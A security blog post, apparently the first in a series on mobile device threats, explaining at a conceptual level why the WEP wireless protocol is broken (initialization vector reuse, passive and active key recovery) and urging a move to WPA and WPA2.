Diving into Wireless Network Threats – Weaknesses in WEP

As I mentioned in my earlier blog post, I will be writing about various threats to mobile devices. To start off, I’m going to delve into the attacks on the environments that they operate in, namely the wireless networks found in businesses and homes. Just what are the possible ways that an attacker could observe or manipulate users and devices?

In order to explore the world of wireless network security, let’s talk first about the Wired Equivalent Privacy (WEP) protocol. Of course, every security professional worth their salt knows that WEP is not effective for establishing a secure wireless network. Unfortunately, there’s no way to tell how employees set up their home network, and it’s debatable whether it has any secure at all.  When you think about members of your organization with access to sensitive data, data that could be profitable in the hands of unscrupulous competitors and investors, are you sure they’re not using WEP at home?

Of course not, we simply must assume they are not following best practices. It's quite possible that they configured their wireless some time ago and never made any updates to it. What about networks that are under direct control of the business? WEP should be all but extinct. Unfortunately it's not.  In 2013, Information Week found that 15% of business networks continue to use WEP, which I think is surprisingly high given how long it’s been considered insecure.

WEP emerged circa 1999, and it wasn’t long before a team of researchers identified a serious flaw. Subsequent flaws (as well as poor implementations of WEP in various products) led to even more devastating attacks, and improvements to the tools used to implement the attack

One of the critical weaknesses in WEP lies in how it handles initialization vectors, which are basically a random number used in conjunction with an encryption key to protect data for WEP’s stream cipher RC4. In WEP, the initialization vector is 24 bits and transmitted in the clear, which means that generating unique values becomes impossible after sending 2^24 packets, and the initialization vectors will repeat. In a secure environment, the key should be replaced before exhausting the initialization vectors, but there is no way to automate the process in WEP. Thus, given enough traffic, there will be initialization vector collisions, which in conjuncition with other techniques, makes it possible to deduce the WEP key.

Note that this can be done by passively monitoring the network traffic using a wireless network card in promiscuous mode. Passive monitoring leaves no indication that the access point is under attack, for the attacker isn’t doing anything but making copies of the packets. The downside to passive monitoring is that it requires a legitimate user on the network to generate a sufficient amount of traffic needed to recover the key.  From the perspective of targeting a specific person, the first attacks against WEP were theoretically sound yet still somewhat impractical.

However, the attack methods against WEP improved over the years, and resulted in much less traffic and time requirements. In addition, through the use of active techniques (with the attacker sending traffic to the target access point), the time break into WEP-protected networks dropped from days to minutes, thus making it very practical to conduct a highly targeted attack. An attacker could simply park in front of your board member’s house and gain access to a WEP-protected wireless network with relative ease.

In the past, the process for cracking a WEP key required several tools, including ones for reconnaissance, packet collection, packet injection and cracking the key itself. Today, the tools found in common penetration testing kits are now fully automated, with GUIs that make cracking a WEP key as easy as point & click.

The attacks on WEP do not depend on having a massive amount of computing power, and are not greatly affected by the size of the encryption key. The attack isn’t dependent upon how complex the original passphrase was. It’s simply a matter of being able to collect enough traffic.

Once it became apparent that WEP had fatal, unfixable flaws, there were immediate efforts to develop a successor. Since a replacement was needed immediately, there was an interim standard developed called Wi-Fi Protected Access (WPA)  published in 2003, which was further refined as WPA2 in 2004. With more secure alternatives on the market for over nine years, it seems like WEP would be all but extinct, but sadly that’s not the case. WEP remains in use in way too many places.

In the next blog post, we will take a look at WEP’s successor, WPA and WPA2, and look at the techniques used to recover those keys.